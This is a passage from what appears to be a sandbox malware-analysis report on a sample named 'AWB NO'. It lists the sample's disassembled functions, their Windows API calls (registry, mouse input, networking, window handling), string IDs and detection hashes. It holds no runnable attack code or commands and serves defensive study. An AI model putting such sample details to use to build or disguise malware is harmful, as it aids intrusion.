                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                              • String ID:
                                                              • API String ID: 3761583154-0
                                                              • Opcode ID: dc5fdbe3e6c8d5d80dd36c6044e9a24c0599173ae697d0bdf9350a60250df054
                                                              • Instruction ID: 3a502a6ae8d305f9b651b9d3386196c099983abe0a10d70971b35180c26ce8e7
                                                              • Opcode Fuzzy Hash: dc5fdbe3e6c8d5d80dd36c6044e9a24c0599173ae697d0bdf9350a60250df054
                                                              • Instruction Fuzzy Hash: A821D371200518BFDB14AFA9DC88CAB77ECEB09760B10813AFD54CB2A1DB74DD458B68
                                                              Function 00423469 Relevance: 10.6, APIs: 7, Instructions: 89COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00429E4B: EnterCriticalSection.KERNEL32(00000000,?,00429CBC,0000000D), ref: 00429E76
                                                              • DecodePointer.KERNEL32(004BBB70,0000001C,004233C2,00000000,00000001,00000000,?,00423310,000000FF,?,00429E6E,00000011,00000000,?,00429CBC,0000000D), ref: 004234B6
                                                              • DecodePointer.KERNEL32(?,00423310,000000FF,?,00429E6E,00000011,00000000,?,00429CBC,0000000D), ref: 004234C7
                                                              • EncodePointer.KERNEL32(00000000,?,00423310,000000FF,?,00429E6E,00000011,00000000,?,00429CBC,0000000D), ref: 004234E0
                                                              • DecodePointer.KERNEL32(-00000004,?,00423310,000000FF,?,00429E6E,00000011,00000000,?,00429CBC,0000000D), ref: 004234F0
                                                              • EncodePointer.KERNEL32(00000000,?,00423310,000000FF,?,00429E6E,00000011,00000000,?,00429CBC,0000000D), ref: 004234F6
                                                              • DecodePointer.KERNEL32(?,00423310,000000FF,?,00429E6E,00000011,00000000,?,00429CBC,0000000D), ref: 0042350C
                                                              • DecodePointer.KERNEL32(?,00423310,000000FF,?,00429E6E,00000011,00000000,?,00429CBC,0000000D), ref: 00423517
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: Pointer$Decode$Encode$CriticalEnterSection
                                                              • String ID:
                                                              • API String ID: 3368343417-0
                                                              • Opcode ID: ddd400cee192f1d78a26ae5404583a63b218aaae79ca52faf5ff64f7f126cf0e
                                                              • Instruction ID: 3168759b68b3528871130379f2647817ede4ef76fb213818c188671a570935ec
                                                              • Opcode Fuzzy Hash: ddd400cee192f1d78a26ae5404583a63b218aaae79ca52faf5ff64f7f126cf0e
                                                              • Instruction Fuzzy Hash: F8316D31A00329AFDF50AF69FC0579D7AB1BB48315F94447FE804A6290DBBD1A84CB1C
                                                              Function 0048783C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00401D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00401D73
                                                                • Part of subcall function 00401D35: GetStockObject.GDI32(00000011), ref: 00401D87
                                                                • Part of subcall function 00401D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00401D91
                                                              • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 004878A1
                                                              • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 004878AE
                                                              • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 004878B9
                                                              • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 004878C8
                                                              • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 004878D4
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$CreateObjectStockWindow
                                                              • String ID: Msctls_Progress32
                                                              • API String ID: 1025951953-3636473452
                                                              • Opcode ID: 521e1264683aec45ec588e50e47250bff2fe7330e07d986e850df4f2a6ea1db9
                                                              • Instruction ID: c0e5e83d8caaffed66c3671765ff495ed8936c55081b1a71fa7d1f8dd9a4b5cd
                                                              • Opcode Fuzzy Hash: 521e1264683aec45ec588e50e47250bff2fe7330e07d986e850df4f2a6ea1db9
                                                              • Instruction Fuzzy Hash: 5311C8B2510119BFEF15AF60CC85EEB7F5DEF08758F114125F604A2090C775AC21DBA4
                                                              Function 004648F3 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 73networkCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: CleanupStartupgethostbynamegethostnameinet_ntoa
                                                              • String ID: 0.0.0.0
                                                              • API String ID: 348263315-3771769585
                                                              • Opcode ID: b7c783d93da174af5ed9cd3c85f3cd70279807f77974c3be71bcfa466d8d5295
                                                              • Instruction ID: a415c47feca9f18ccc9aca6889e14e15c95de93dcf3fd0710918b8717f4bba87
                                                              • Opcode Fuzzy Hash: b7c783d93da174af5ed9cd3c85f3cd70279807f77974c3be71bcfa466d8d5295
                                                              • Instruction Fuzzy Hash: FE110571A04124ABDB20AB34AD06EDF77ACDF40714F1001BBF40492191FFB89AC9976A
                                                              Function 00464534 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 47windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 0046454E
                                                              • LoadStringW.USER32(00000000), ref: 00464555
                                                              • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0046456B
                                                              • LoadStringW.USER32(00000000), ref: 00464572
                                                              • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004645B6
                                                              Strings
                                                              • %s (%d) : ==> %s: %s %s, xrefs: 00464593
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: HandleLoadModuleString$Message
                                                              • String ID: %s (%d) : ==> %s: %s %s
                                                              • API String ID: 4072794657-3128320259
                                                              • Opcode ID: cf1f71f02d618412e5e4011ee75cbf7dd1c2efdd86ab7fdc5ff900bbdf96f69c
                                                              • Instruction ID: 26d6b9379a34e5b6735d9e290e406bfe10dd0a5cb8e1345d55a1fd9b07754018
                                                              • Opcode Fuzzy Hash: cf1f71f02d618412e5e4011ee75cbf7dd1c2efdd86ab7fdc5ff900bbdf96f69c
                                                              • Instruction Fuzzy Hash: 2F0167F2500208BFE750A790DD89EEB776CEB08301F5009BABB45E2051E6789E894B79
                                                              Function 004241C9 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 24libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00424292,?), ref: 004241E3
                                                              • GetProcAddress.KERNEL32(00000000), ref: 004241EA
                                                              • EncodePointer.KERNEL32(00000000), ref: 004241F6
                                                              • DecodePointer.KERNEL32(00000001,00424292,?), ref: 00424213
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                              • String ID: RoInitialize$combase.dll
                                                              • API String ID: 3489934621-340411864
                                                              • Opcode ID: ddfa7ecf956035a75bb873e4545af4f7585191630ec01220704f4d047e2aa69d
                                                              • Instruction ID: c49f78410c04fde3648442f996d7962f385baa81e21f20bc912104f4af3013fa
                                                              • Opcode Fuzzy Hash: ddfa7ecf956035a75bb873e4545af4f7585191630ec01220704f4d047e2aa69d
                                                              • Instruction Fuzzy Hash: 23E01AB0690300AEEF615BB1ED1DF193AA4B7A0B02F544939B851D51A0DBF944999F1C
                                                              Function 0042429E Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,004241B8), ref: 004242B8
                                                              • GetProcAddress.KERNEL32(00000000), ref: 004242BF
                                                              • EncodePointer.KERNEL32(00000000), ref: 004242CA
                                                              • DecodePointer.KERNEL32(004241B8), ref: 004242E5
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                              • String ID: RoUninitialize$combase.dll
                                                              • API String ID: 3489934621-2819208100
                                                              • Opcode ID: 38a029e66ea7d27f7a9163d1d7d860f5c65e6d37c153c2e42146312fef8db417
                                                              • Instruction ID: 15b1a5aa7e18a967cd8893ea7d93c869ab9a07ceb3ae99f86fd7b01cca389b21
                                                              • Opcode Fuzzy Hash: 38a029e66ea7d27f7a9163d1d7d860f5c65e6d37c153c2e42146312fef8db417
                                                              • Instruction Fuzzy Hash: 71E04F78681300EFDB409B21FE0CF493AA4F750742F140539F041D11A0CFB84644CB1C
                                                              Function 0048046F Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 004810A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00480038,?,?), ref: 004810BC
                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00480548
                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00480588
                                                              • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 004805AB
                                                              • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 004805D4
                                                              • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00480617
                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00480624
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                              • String ID:
                                                              • API String ID: 3451389628-0
                                                              • Opcode ID: 8617961bc64a4f386c06648709e68485a6aa700477c4de8ee2aee0f2d00a767d
                                                              • Instruction ID: b84270fded324d951e7523c32ca62a415ab9193bd248edf919504d3f3afdc4c8
                                                              • Opcode Fuzzy Hash: 8617961bc64a4f386c06648709e68485a6aa700477c4de8ee2aee0f2d00a767d
                                                              • Instruction Fuzzy Hash: F3516D31618200AFC714EF15C885E6FBBE8FF85318F04492EF445972A1DB35E909CB5A
                                                              Function 004399F2 Relevance: 9.2, APIs: 6, Instructions: 160memoryfileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00431B11: SetFilePointerEx.KERNEL32(00000000,00000002,?,00000000,?,00000000,00000000,00000000,00000000,?,0042DC91,?,00000000,00000000,00000002,00000000), ref: 00431B48
                                                                • Part of subcall function 00431B11: GetLastError.KERNEL32(?,0042DC91,?,00000000,00000000,00000002,00000000,00000000,00000000), ref: 00431B52
                                                              • GetProcessHeap.KERNEL32(00000008,00001000,?,?,?,?,?,0048FB24,00000001,00000000,?,?,00438499,0048FB24,0000000C,00000080), ref: 00439A5B
                                                              • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,0048FB24,00000001,00000000,?,?,00438499,0048FB24,0000000C,00000080), ref: 00439A62
                                                              • GetProcessHeap.KERNEL32(00000000,0048FB24,?,?,?,?,?,?,?,?,0048FB24,00000001,00000000,?,?,00438499), ref: 00439B04
                                                              • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,0048FB24,00000001,00000000,?,?,00438499,0048FB24), ref: 00439B0B
                                                              • SetEndOfFile.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,0048FB24,00000001,00000000,?,?,00438499), ref: 00439B41
                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,0048FB24,00000001,00000000,?,?,00438499,0048FB24), ref: 00439B71
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: Heap$ErrorFileLastProcess$AllocFreePointer
                                                              • String ID:
                                                              • API String ID: 1354853467-0
                                                              • Opcode ID: 3a56cc76121ffd535eb3f0d2cc8e516db7487c1ce8b648c8b367495e3c84d52b
                                                              • Instruction ID: ee0696fb388e8808cd6bda18fae8670ff0aadf61ef9e5b549f746bd32f3fa55f
                                                              • Opcode Fuzzy Hash: 3a56cc76121ffd535eb3f0d2cc8e516db7487c1ce8b648c8b367495e3c84d52b
                                                              • Instruction Fuzzy Hash: CD412731A00554ABDB206BB99C4A76E7AB4FF49330F14172FF825D22E0E7BC5D018769
                                                              Function 00485A20 Relevance: 9.2, APIs: 6, Instructions: 160windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetMenu.USER32(?), ref: 00485A82
                                                              • GetMenuItemCount.USER32(00000000), ref: 00485AB9
                                                              • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00485AE1
                                                              • GetMenuItemID.USER32(?,?), ref: 00485B50
                                                              • GetSubMenu.USER32(?,?), ref: 00485B5E
                                                              • PostMessageW.USER32(?,00000111,?,00000000), ref: 00485BAF
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: Menu$Item$CountMessagePostString
                                                              • String ID:
                                                              • API String ID: 650687236-0
                                                              • Opcode ID: 11bfc59b1706f593e0ac17f510947c20b49268303c0a9202c5cc1a16344a885e
                                                              • Instruction ID: c9ca8b8726438513afe2720f1a288169c3e90a9b7cee580165c83d3fb24cc843
                                                              • Opcode Fuzzy Hash: 11bfc59b1706f593e0ac17f510947c20b49268303c0a9202c5cc1a16344a885e
                                                              • Instruction Fuzzy Hash: E751B131A00615EFCF15EFA5C881AAEB7B4EF18314F10486AE811B7351DB78BE418B99
                                                              Function 00401765 Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                                                              • BeginPaint.USER32(?,?,?,?,?,?), ref: 0040179A
                                                              • GetWindowRect.USER32(?,?), ref: 004017FE
                                                              • ScreenToClient.USER32(?,?), ref: 0040181B
                                                              • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0040182C
                                                              • EndPaint.USER32(?,?), ref: 00401876
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                              • String ID:
                                                              • API String ID: 1827037458-0
                                                              • Opcode ID: f83e22be4ec08e4416acf2e7a9eb32b17cef3cd4e201653c29a1d580359e6f65
                                                              • Instruction ID: f496b0d24a919446a821901bb08c967343d20a2d6e91284dadc4af8012d8984c
                                                              • Opcode Fuzzy Hash: f83e22be4ec08e4416acf2e7a9eb32b17cef3cd4e201653c29a1d580359e6f65
                                                              • Instruction Fuzzy Hash: F8418C71100200AFD710EF25C884FAA7BE8EB49724F044A3EFA94962F1C7359946DB6A
                                                              Function 0048B958 Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ShowWindow.USER32(004C67B0,00000000,0106B0C0,?,?,004C67B0,?,0048B862,?,?), ref: 0048B9CC
                                                              • EnableWindow.USER32(00000000,00000000), ref: 0048B9F0
                                                              • ShowWindow.USER32(004C67B0,00000000,0106B0C0,?,?,004C67B0,?,0048B862,?,?), ref: 0048BA50
                                                              • ShowWindow.USER32(00000000,00000004,?,0048B862,?,?), ref: 0048BA62
                                                              • EnableWindow.USER32(00000000,00000001), ref: 0048BA86
                                                              • SendMessageW.USER32(?,0000130C,?,00000000), ref: 0048BAA9
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: Window$Show$Enable$MessageSend
                                                              • String ID:
                                                              • API String ID: 642888154-0
                                                              • Opcode ID: 7ca0fe6c9807323bcc0ac8ff00a913c3fb6576fd02a22b3a16232a66ac7b93cd
                                                              • Instruction ID: 4bbfffa5aca34bc284a6f875752b5b7a56a0dd7a11c68d007de5de2d50af2dcc
                                                              • Opcode Fuzzy Hash: 7ca0fe6c9807323bcc0ac8ff00a913c3fb6576fd02a22b3a16232a66ac7b93cd
                                                              • Instruction Fuzzy Hash: 6E416470600241EFDB25DF14C489B9A7BE0FF05314F1846BAEE589F3A2C735A84ADB95
                                                              Function 00467368 Relevance: 9.1, APIs: 6, Instructions: 101fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • InterlockedExchange.KERNEL32(?,000001F5), ref: 0046737F
                                                              • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 004673B6
                                                              • EnterCriticalSection.KERNEL32(?), ref: 004673D2
                                                              • LeaveCriticalSection.KERNEL32(?), ref: 0046744C
                                                              • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00467461
                                                              • InterlockedExchange.KERNEL32(?,000001F6), ref: 00467480
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                                              • String ID:
                                                              • API String ID: 3368777196-0
                                                              • Opcode ID: eb46bb9106ca0d67a19ef44e0f7e973a2f50d0ed2a8d0ad9678ec435f6c636a1
                                                              • Instruction ID: 65819b3e7115d32fcddc7406d2ba819fbe47c506c600941c259629cf32f05e9e
                                                              • Opcode Fuzzy Hash: eb46bb9106ca0d67a19ef44e0f7e973a2f50d0ed2a8d0ad9678ec435f6c636a1
                                                              • Instruction Fuzzy Hash: EF31F231A00205EBCF10DF55DC89AAF7BB8EF44300B1441BAF900AB246DB749E14CBA8
                                                              Function 004773B1 Relevance: 9.1, APIs: 6, Instructions: 97COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetForegroundWindow.USER32(?,?,?,?,?,?,00475134,?,?,00000000,00000001), ref: 004773BF
                                                                • Part of subcall function 00473C94: GetWindowRect.USER32(?,?), ref: 00473CA7
                                                              • GetDesktopWindow.USER32 ref: 004773E9
                                                              • GetWindowRect.USER32(00000000), ref: 004773F0
                                                              • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00477422
                                                                • Part of subcall function 004654E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0046555E
                                                              • GetCursorPos.USER32(?), ref: 0047744E
                                                              • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 004774AC
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                              • String ID:
                                                              • API String ID: 4137160315-0
                                                              • Opcode ID: 1bbe2dab67a06001c52ae2f9a22043e2ef62813232fffdc4d3db5c9dfcd07594
                                                              • Instruction ID: 451e44952bf497c2b349903a2f13307d0e496186b9ded03a72eae34462921b73
                                                              • Opcode Fuzzy Hash: 1bbe2dab67a06001c52ae2f9a22043e2ef62813232fffdc4d3db5c9dfcd07594
                                                              • Instruction Fuzzy Hash: AB31C172508305ABD720DF14D849F9BBBA9FF88318F40492EF588A7191DA34E9098B96
                                                              Function 00458D5B Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 004585F1: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00458608
                                                                • Part of subcall function 004585F1: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00458612
                                                                • Part of subcall function 004585F1: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00458621
